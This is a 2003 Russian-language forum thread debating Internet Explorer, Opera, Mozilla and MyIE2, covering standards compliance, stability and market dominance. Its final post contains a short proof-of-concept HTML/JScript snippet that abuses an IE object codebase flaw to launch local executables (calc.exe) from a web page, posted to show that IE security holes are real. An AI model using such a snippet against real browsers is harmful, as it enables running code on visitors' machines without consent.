Перейти из форума на сайт.

НовостиФайловые архивы
ПоискАктивные темыТоп лист
ПравилаКто в on-line?
Вход Забыли пароль? Первый раз на этом сайте? Регистрация
Компьютерный форум Ru.Board » Компьютеры » Программы » Браузерные войны

Модерирует : gyra, Maz

Widok (01-10-2004 22:40): переезд: http://forum.ru-board.com/topic.cgi?forum=5&topic=13160  Версия для печати • ПодписатьсяДобавить в закладки
Страницы: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100

Браузерные войны
 ОтветГолосаПроценты
IE287
25.58%
Opera476
42.42%
Netscape26
2.32%
Mozilla137
12.21%
Другой23
2.05%
надстройки над IE173
15.42%
Тема закрыта .Всего Голосов: 1122
Qzz

Advanced Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
Spybot

Цитата:
На мой взгляд если бы они взаимодействовали ещё до краха NC, сейчас могли бы иметь некий шедевр вроде Internet Navigator  

Думаю что было бы супер если бы они взаимодействовали ещё тогда, но они не взаимодействуют и сейчас, просто АОЛ забила на Нетскейп, разве это взаимодействие?
Кроме того в результате взаимодействия не должен появится один продукт.

Цитата:
5-й IE явно превосходил 4-е нетскейпы (уже с любой точки зрения) и похоронил их вполне закономерно.

Ага, и сейчас у ИЕ есть плюсы, но их о-очень мало, а основной плюс это его распространёность...

Цитата:
Там кстати (в статье) было и о том что нового релиза ИЕ типа не будет.

Насколько я понял отдельного релиза не будет. Будет только в составе виндов и пр. продуктов.

Кстати 2RefuZZer вполне возможно что к тебе заходил кто-то с бетой Лонгхорна...

rits
Стандарты бывают "де-юре" и "де-факто". Height в таблицах уже давно подерживается всеми потому что это удобней и правельней. А то что его нет в спецификации W3C, это их недоработка.
Правда это не значит что на спецификации W3C нужно забить ваще!

Всего записей: 924 | Зарегистр. 18-02-2002 | Отправлено: 17:05 04-06-2003
tolja

Silver Member
Я вот до сих пор не пойму,о чем этот топик?О каких "войнах " речь то  идет,кого с кем,кто придумал это?Кто-то собрался Эксплорер сожрать и занять его место в Windows,что-ли? Кто ратную силу собирает? Опера?Мозилла,или еще кто?Просветите,активные участники.Наверно,пока я своим любимым Mozilla Firebird занимался,так видать отстал от жизни.
А если серьезно,топик хороший,нужный,вот только название...Правильнее было бы назвать его что то вроде этого:"Сравнение свойств современных браузеров",или "Наведем критику на IExsplorer",а то нас фантазерами обзовут.

Всего записей: 2449 | Зарегистр. 24-08-2002 | Отправлено: 17:25 04-06-2003
Spybot

BANNED
tolja

Цитата:
О каких "войнах " речь то  идет,кого с кем,кто придумал это?Кто-то собрался Эксплорер сожрать и занять его место в Windows,что-ли?

Пережиток прошлого
Раньше было актуально... Сейчас думаю что на любой ход мнимых конкурентов MS найдёт что ответить. И это будет не порк-эдишн какой-нибудь...
Кстати вот Firebird не хотелось бы потерять со сцены. Перспективная штука в принципе.

Цитата:
"Наведем критику на IExsplorer"

Вот только никому это не надо... На Оперу чтоли работать задарма, нет уж. Платный браузер это вообще неприлично по-моему.

Qzz

Цитата:
АОЛ забила на Нетскейп, разве это взаимодействие?

Ну вообще то да. Взаимовыгодное.

Цитата:
и сейчас у ИЕ есть плюсы, но их о-очень мало, а основной плюс это его распространёность...

Он же старый. И при этом удерживает енту пальму. Значит не в распространённости одной дело. Хотя это программеры да прочие специалисты должны сравнивать... При условии что они объективны будут.

Цитата:
Стандарты бывают "де-юре" и "де-факто".  

К тому же разные. И вклад в развитие этих технологий внесли как раз MS и Netscape, а имхо Опера изначально пыталась паразитировать.

Всего записей: 1113 | Зарегистр. 07-12-2002 | Отправлено: 18:33 04-06-2003
Qzz

Advanced Member
Spybot

Цитата:
Ну вообще то да. Взаимовыгодное.

Это не взаимодействие, а способ решения судебных споров. АОЛ получила денег и право юзать чужую технологию на 7 лет. Можно некисло с экономить на разработке своих. Кроме того юзеры тут не выйграют я дмаю... хотя может я и ошибаюсь...

Цитата:
Он же старый. И при этом удерживает енту пальму. Значит не в распространённости одной дело. Хотя это программеры да прочие специалисты должны сравнивать... При условии что они объективны будут.  

Это значит что именно в распространённости и дело! Поверь, ИЕ держится только за счёт бесплатности и общедоступноси!
Давай прикинем что ИЕ нет в винде, и его нужно выкачивать из инета. И ещё к нему нет MyIE. Подсчитаем тепрь его долю? С ИЕ сечас происходит почти тоже что и с Нетскейпом несколько лет назад. ИЕ — тормоз. И это не потому что он от Майкрософт.

"имхо Опера изначально пыталась паразитировать."
Что значит "поразитировать"? Задача браузеро строителей делать удобные браузеры а не разрабатывать стандарты. Скажем ACDsee работает с кучай графических форматов приэтом не внося чего-то нового в них, и заметь, правильно делает! Я бы посмотрел на джпеги которые не открывает никто кроме ACDsee :)

Всего записей: 924 | Зарегистр. 18-02-2002 | Отправлено: 19:10 04-06-2003
Spybot

BANNED
Qzz

Цитата:
Что значит "поразитировать"?  

В 4-й версии помнится Опера напоминала облегчённый ИЕ, теперь с Мозиллой сходство больше. Короче в отдельный "третий путь" всё это не превратилось. Много слов о рае для диалапщиков, а на деле - заурядный браузер наподобие ещё одной мозилки, уже не лёгкий и не самый скоростной...

Цитата:
Кроме того юзеры тут не выйграют я дмаю...

Лучше уж так уйти чем заниматься ерундой типа лишения юзеров под ИЕ возможности зайти на мозилла.орг. Кстати - вот и пример криворуких дезигнеров. =)))
Если команда Нетскейпа поучаствует в разработке нового ИЕ то выиграют все. Кроме оперников.

Цитата:
Давай прикинем что ИЕ нет в винде, и его нужно выкачивать из инета. И ещё к нему нет MyIE. Подсчитаем тепрь его долю?

Я уже сказал - при таких перспективах Гейтс принял бы меры. На троне ИЕ оказался заслуженно, а то что он не выходит раз в неделю в виде глючных билдов - так оно им сейчас не надо. Надстройки развиваются быстро, а движок обновят со временем.
Ну вот почему-то у меня нет желания слезать с МуИЕ2, ни на Мозиллу, ни на Оперу... С чего бы это так...

Всего записей: 1113 | Зарегистр. 07-12-2002 | Отправлено: 22:19 04-06-2003
Qzz

Advanced Member
Spybot

Цитата:
Короче в отдельный "третий путь" всё это не превратилось.

А что должно было???

Цитата:
на деле - заурядный браузер наподобие ещё одной мозилки

Ну-ну... мало того что "мозиллка" классный браузер...

Цитата:
лишения юзеров под ИЕ возможности зайти на мозилла.орг

хмм... а что было? ну глупо не спорю... но думаю это инициатива нескольких челов, которую быстро прикрыли... я прав?

Цитата:
Если команда Нетскейпа поучаствует в разработке нового ИЕ то выиграют все.

Ну что за утопия? Команда Нетскейпа, та её часть что делала Мозиллу врядли вольётся в состав разработчиков ИЕ, это вам не собачек скрещивать... а те кто перебивал надписи Мозилла на Нетскейп врядли внесут чего-то нового...
А выйграют все тогда когда будет толковая конкуренция на рынке браузеров, а сейчас пока монополия, хоть доля ИЕ и сокращается, но медленно...

Кстати вот вам и илюстрация, думаете Майкрософт так относилась бы к рынку браузеров если бы у неё не было такой позиции??

Цитата:
Я уже сказал - при таких перспективах Гейтс принял бы меры.

Во-во, а ща ему нах ненужно шевелится. Кто от этого выигрывает? Наверное только Майкрософт...

Цитата:
На троне ИЕ оказался заслуженно

Спорный вопрос. Покрайней мере на сегодняшний день.

Цитата:
а то что он не выходит раз в неделю в виде глючных билдов - так оно им сейчас не надо.

Угу им лучше выпускать глючные релизы, а не билды ;))

Цитата:
Надстройки развиваются быстро, а движок обновят со временем.

Канешеа обновят! Куда денутся, и думаю что движок будет неплох, возможно даже круче всего того что будет на тот момент. Но это будет ещё года через два, и это будет только на Лонгхорне. А ведь за эти 2 года (я не считаю те 2 года что уже прошли) народ потихоничку, перелез бы на новый движок, который держал бы современные стандарты. У дизигнеров было бы меньше головной боли по совмещению несовместимого и т.д. А вместо этого мы все сосём и юзаем сурагатные надстройки.
Я считаю что раз уж ты лидер, так нех тормозить! А то выходит что чувак вырвался вперёд и стал в уском проходе с широкой спиной.

Цитата:
Ну вот почему-то у меня нет желания слезать с МуИЕ2, ни на Мозиллу, ни на Оперу... С чего бы это так...  

Потому что выбора у тебя другого нет. Ну нелюбишь ты не Мозиллу не Оперу... что уж тут поделать...

Всего записей: 924 | Зарегистр. 18-02-2002 | Отправлено: 23:59 04-06-2003
tolja

Silver Member
Spybot

Цитата:

Да потому ,что MY (и другие надстройки) т.е. IExsplorer в Виндовсе у себя дома,хозяинОпера и другие -незванные гости,забывшие правила хорошего тона.

Всего записей: 2449 | Зарегистр. 24-08-2002 | Отправлено: 00:01 05-06-2003 | Исправлено: tolja, 00:54 05-06-2003
Spybot

BANNED
tolja
Просто потому что он мне нравится. И не только мне.

Qzz

Цитата:
Куда денутся, и думаю что движок будет неплох, возможно даже круче всего того что будет на тот момент.

Как всегда будет лучше остального... И опять незаслуженно. =)))

Цитата:
хмм... а что было? ну глупо не спорю... но думаю это инициатива нескольких челов, которую быстро прикрыли... я прав?

Не знаю подробностей... с тех пор плюнул и не заходил к ним. Нетскейп так не поступал, и их браузер в отличие от Оперы не глючил на мелкософтовских сайтах.

Цитата:
мало того что "мозиллка" классный браузер...  

В родной среде может быть... А на виндах это тормоз.  

Цитата:
А выйграют все тогда когда будет толковая конкуренция на рынке браузеров, а сейчас пока монополия, хоть доля ИЕ и сокращается, но медленно...  

Было уже... Толковая конкуренция - финал логичный. Теперь конкуренция мелочная.

Цитата:
Угу им лучше выпускать глючные релизы, а не билды )  

Тьфу ты... Да что за глюки то в нём? Где? На Маках? Под виндами не видел такого... везёт же мне. =)

Всего записей: 1113 | Зарегистр. 07-12-2002 | Отправлено: 01:05 05-06-2003
rits

Junior Member

Цитата:
Ты кого сейчас криворуким назвал? Всех кроме себя?

всех кто единственным тестом своего кода считает IE, а остальные браузеры называет левыми и нестандартными (sic!).

Цитата:
У тебя дизайнерское образование? Какой опыт?

образование у меня художественное и опыт тоже имеется, поверь.

Цитата:
Ты себе таблицы то без высоты представляешь хоть?

я и делаю таблицы без высоты. А html разрабатывался как язык разметки, а не рисования.  

Цитата:
Стандарты бывают "де-юре" и "де-факто". Height в таблицах уже давно подерживается всеми потому что это удобней и правельней. А то что его нет в спецификации W3C, это их недоработка.

Для примера могу привести postscript, каково бы было, если каждый принтер как хотел так и печатал? Стандарты на то и стандарты. Вот еще - DVD forum и всякие альянсы договориться не могут, и мы имеем кучу плюсов минусов и высокие цены, а сейчас еще и ворох несовместимых голубо-лазерные приводов нас ждет. Я все это говорю к тому, что если бы html изначально жестко поддерживался, то и развивался бы он быстрее. А так приходится писать под разные версии броузеров.

По своему опыту могу сказать, что если страничка в опере показывается криво, то 99% она написанна с ошибками, а вот IE может запросто криво отобразить то что полностью соответствует w3с стандартам.

Всего записей: 85 | Зарегистр. 07-02-2003 | Отправлено: 01:59 05-06-2003 | Исправлено: rits, 02:02 05-06-2003
Spybot

BANNED
rits
Жду обещанных глюков ИЕ. =)))

Цитата:
всех кто единственным тестом своего кода считает IE, а остальные браузеры называет левыми и нестандартными  

Нет ты не это сказал. Ты сказал о том что те, кто не следует только твоему излюбленному стандарту (я в том числе, т.к. использую height со времен 4 IE и 3-го NN) - криворукие дезигнеры. А разработчики Оперы - глупцы, потому что исправляют иногда свои ошибки на пользу своим же юзерам...
А ты чем лучше? Другому богу потому что молишься? Наш бог по крайней мере не требует ни танцев с бубном, ни молитв, и правит реально а не на бумагах. И работать надо на юзеров, а не на стандарты.

Цитата:
я и делаю таблицы без высоты. А html разрабатывался как язык разметки, а не рисования.

Делай. Другим мешать зачем? Тебя МС не лишала возможностей, а наоборот расширила рамки возможного. Мы превратим веб-дизайн в штамповку какую-то если будем молится на один стандарт.

Цитата:
Для примера могу привести postscript, каково бы было, если каждый принтер как хотел так и печатал? Стандарты на то и стандарты.

Не надо проводить такие аналогии, неубедительно. Что было бы если бы МС не взялась за отвоевание рынка у Нетскейп? Что было бы если бы МС не разрабатывала свои стандарты, а вешала лапшу на уши о том что их браузер самый-быстрый-да-лёгкий-да-стандартный? Прогресс без конкуренции с трудом представляю. *То что сейчас - имхо не похоже это на полноценную конкуренцию*

Всего записей: 1113 | Зарегистр. 07-12-2002 | Отправлено: 02:58 05-06-2003
tolja

Silver Member
Блин,какие красивые рассуждения,споры...,а чего-то никто не говорит о главном,что Винда-  это бизнес-продукт,это место на Рынке,которое Microsoft отбил.Кого можно-купил,кто не купился-"грибы" сейчас собирают,а всякую "мелкоту" можно и не замечать.Все,до примитивности,просто.Отсюда надо плясать.Вот только Qzz попытался конкретизировать ситуацию:

Цитата:
Я считаю что раз уж ты лидер, так нех тормозить! А то выходит что чувак вырвался вперёд и стал в уском проходе с широкой спиной.  

Вот только первую часть фразы я бы ему не рекомендовал  говорить своему боссу...

Всего записей: 2449 | Зарегистр. 24-08-2002 | Отправлено: 08:43 05-06-2003
Bozo

Silver Member
Spybot

Цитата:

Вот уж извини. На моем Бартоне раскачанном до 2300МГц MyIE2 русской поделки тормозит как Запорожец, а Мозилку поставил броузером по дефолту и не пожалел еще. Очень знаешь удобно начать набирать на клаве "Поис" и видеть как курсор переместился на ссылку поиска и осталось только нажать энтер, а не скроллить 20 экранов вверх или вниз по странице
А как MyIE заставить увеличивать шрифты на тех страницах, где автор указал их асболютную величину? Ведь IE это не умеет, а мозилла - умеет!

Всего записей: 2707 | Зарегистр. 27-06-2001 | Отправлено: 12:04 05-06-2003
Qzz

Advanced Member
Spybot

Цитата:
Как всегда будет лучше остального... И опять незаслуженно. =)))

Незаслуженно лучши быть нельзя, можно быть незаслуженно первым, например....

Цитата:
Не знаю подробностей... с тех пор плюнул и не заходил к ним. Нетскейп так не поступал, и их браузер в отличие от Оперы не глючил на мелкософтовских сайтах.  

Ты меня удевляешь! Ты осуждаешь мозилловцев за точ то они сделали глючный сайт под ИЕ, и тут же гонишь на оперовцев за то что у Майкросовтовцев глюк на сайте! Последовательней надо быть!

Цитата:

Какой у тебя компьютер??? Может стоит поставить третий ИЕ чтоб летало?
Или тебя напрягает более долгая загрузка в самом начале? А не напрягает ли тогда тебя то что ИЕ грузится вместе с виндой?
Ты не как не можешь в дуплится, что большенство плюсов ИЕ обеспеченны не техническим превосходством, а монополией Майкрософта. Я могу согласится что простым юзерам это всё равно, но это не означает что браузер лучше!

Цитата:
Было уже... Толковая конкуренция - финал логичный. Теперь конкуренция мелочная.

Была конкуренция? Правда? Так вот это не конкуренция а избиение! Но темнемение пока Нетскейп защищался и пытался давать сдачи, был прогресс, хотя часто не туда...

Цитата:
Тьфу ты... Да что за глюки то в нём? Где? На Маках? Под виндами не видел такого... везёт же мне. =)  

Да ты везунчик ;) Рад за тебя. Но как не крути а ИЕ переодически вылетает, а Мозилла у меня вылетела один раз и очень давно. Опера конечно вылетает каждый день, но востановить сесию там раз плюнуть... хотя это не оправдание...
Более глубоко с юзерскими глюками ИЕ щас проконсультировать не могу — не так часто с ним работаю, но о дырах в защите все наслышаны?

Цитата:
Что было бы если бы МС не разрабатывала свои стандарты...

Стнадарты должны быть общими. Что было бы если бы Майкрософт добилась официального признания своих стандартов? Какова х@ра все должны мучаться? И не нужно рассказывать что всё и так супер, ладно?

Цитата:
а вешала лапшу на уши о том что их браузер самый-быстрый-да-лёгкий-да-стандартный?

Было бы тоже что сечас с разницей, от силы, на десяток процентов.

Цитата:
Прогресс без конкуренции с трудом представляю.

да-а.... а щас у нас, простите, конкуренция? или только прогресс?

rits

Цитата:

Для чего разрабатывался это одно, другое для чего он используется. Высота в таблице применяется уже давно и многими. Кроме того реализовано практичиски везде. Это и есть стандарт де-факто.
Хотя я с тобой и согласен, что от стандартов отходить нельзя, но в данном случае это уже стандарт, и W3C по не понятным причинам несделала его официальным.

Всего записей: 924 | Зарегистр. 18-02-2002 | Отправлено: 14:43 05-06-2003
Spybot

BANNED
Qzz

Цитата:
и тут же гонишь на оперовцев за то что у Майкросовтовцев глюк на сайте!

Я не принимал участие (к сожалению) в разработке оффсайта Майкрософт. Не знаю о глюках на сайте, впрочем сайты и не глючат - глючить может только браузер, в данном случае почему-то только один. =)

Цитата:
Но как не крути а ИЕ переодически вылетает, а Мозилла у меня вылетела один раз и очень давно. Опера конечно вылетает каждый день

MyIE2 может вылетает изредка (простительно учитывая его возраст), а с 6-м ИЕ я такого не видел кажется вообще, за 5-ым было может несколько случаев за пару лет. Нетскейп у меня работал ещё стабильнее начиная аж с 4-х версий, а вот 6-я и 7-я Оперы улетали когда им вздумается.
Всё это под виндами с 95 до ХР.
Лучше забыть про слово "глюки" - глючней те продукты, которые обновляются часто (плюс Опера но уже по своей природе видимо), ну уж никак не финальные релизы таких монстров как IE и NC.
А вот насчёт дыр в безопасности - это уже пиар-овские песни, аналогично говорят и о страшно безопасных линухах, а на деле это очень спорный вопрос. Дыры всегда были и будут, их будут находить и патчить. Их будут находить прежде всего в наиболее используемых продуктах. Это никакого отношения к теме по-моему не имеет.

Цитата:
Какой у тебя компьютер???  

Обычный. Какая разница то? Celeron+nVidia+aOpen+192MB+бла-бла-бла... В основном - примерно 2-х летней давности. О виндах выше сказал.
3-й ИЕ это антиквариат, сам ставь если хочешь окунуться в далёкое прошлое. Заодно и прогресс увидишь. =)))

Bozo

Цитата:
А как MyIE заставить увеличивать шрифты на тех страницах, где автор указал их асболютную величину?

Там есть zoom. А то что размер шрифта можно сделать фиксированным это было повсюду вплоть до 6-го NC. Это не хорошо и не плохо, это выбор для авторов страниц. Так же как и полоса прокрутки. Как с этим поступить - дело вебмастеров, а в браузерах просто нужно побольше опций, чтобы дать пользователю возможность настраивать всё и вся.
ps Intel foreva!!! =)))

Добавлено
Qzz

Цитата:
Стнадарты должны быть общими. Что было бы если бы Майкрософт добилась официального признания своих стандартов?

Наступил бы ваш рай. Один единственный стандарт, не более и не менее.
Её стандарты или w3c - какая разница? Стандарт - это основа и не более.
Браузер от МS вполне поддерживает если не все то почти все стандарты (только не надо снова про png), плюс имеет свои расширения. Что тут плохого? Тем более говорим о браузере 2000-го (или 99?) года.
Может ещё поспорить что перспективней - JavaScript от Netscape или JScript от MS? А смысл... Хорошо что есть выбор. =)

Всего записей: 1113 | Зарегистр. 07-12-2002 | Отправлено: 17:27 05-06-2003
Bozo

Silver Member
Spybot
Старая такая ссылка.
Что вы еще не знаете о своем Эксплорере?

Всего записей: 2707 | Зарегистр. 27-06-2001 | Отправлено: 23:16 05-06-2003
Spybot

BANNED
Bozo
Не сработало, обыдно да?
Хотя написано что сд-ром выдвинул... но только написано.

Всего записей: 1113 | Зарегистр. 07-12-2002 | Отправлено: 23:23 05-06-2003
QuickeneR

Advanced Member
Bozo
Классный пример! Полезно напомнить фанатам эксплорера о реальности.

Spybot
Признавайся уже, тебе MS платит за рекламу осла?

Всего записей: 1388 | Зарегистр. 02-02-2002 | Отправлено: 12:42 07-06-2003
Spybot

BANNED
QuickeneR
Да я и непротив оплаты, но... Это Опера в рекламе нуждается, а вы и рады стараться... Она на этом и держится то большей частью.
А у ИЕ положение сверхпрочное. Всё что здесь предъявили как глюки это возможность выдвигать сд-ром, и основной упрёк свёлся к тому что ИЕ помимо основного стандарта имеет ещё и дополнительные возможности (!)... Право же смешно порой, кулхацкиры млин... =)

У ИЕ нет и не было фанатов - это пользователи. Фанаты могут быть у самоделок.
Нечем пока что этим самоделкам заставить МС действовать. А если и заставят - думаю что новый ИЕ их отбросит далеко назад.

Всего записей: 1113 | Зарегистр. 07-12-2002 | Отправлено: 15:45 07-06-2003
QuickeneR

Advanced Member

Цитата:
Это Опера в рекламе нуждается, а вы и рады стараться... Она на этом и держится то большей частью.  

Ну ты сказал Она держится на том, что их продукт нам нравится, поскольку точно соответствует нашим требованиям. А реклама - это внутренние проблемы компании.

Цитата:
А у ИЕ положение сверхпрочное.

Если положение - это количество пользователей, то тут возражений нет. Только мне на это в высшей степени наплевать. Думаю, и другим любителям Мозиллы/Оперы тоже.

Цитата:
Фанаты могут быть у самоделок.

Самоделка - это звучит гордо! Хотя ты, по видимому, не можешь оценить преимущества open source.

Всего записей: 1388 | Зарегистр. 02-02-2002 | Отправлено: 16:00 07-06-2003
Svarga

Moderator
Spybot
Цитата:
А вот насчёт дыр в безопасности - это уже пиар-овские песни,

Ага... вот тебе ещё довольно древний эксплорерный прикол:

Код:
 <span id="oSpan"></span>  
<script language="jscript" defer>
oSpan.innerHTML='<object classid="clsid:11111111-1111-1111-1111-111111111111" codebase="c:/windows/system32/calc.exe"></object>'
oSpan.innerHTML='<object classid="clsid:11111111-1111-1111-1111-111111111111" codebase="c:/windows/calc.exe"></object>'
oSpan.innerHTML='<object classid="clsid:11111111-1111-1111-1111-111111111111" codebase="c:/winnt/system32/calc.exe"></object>'
</script>

никаких ActiveX'ов даже

----------
away.

Всего записей: 4161 | Зарегистр. 25-06-2002 | Отправлено: 17:27 07-06-2003

Страницы: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100

Компьютерный форум Ru.Board » Компьютеры » Программы » Браузерные войны
Widok (01-10-2004 22:40): переезд: http://forum.ru-board.com/topic.cgi?forum=5&topic=13160

Реклама на форуме Ru.Board.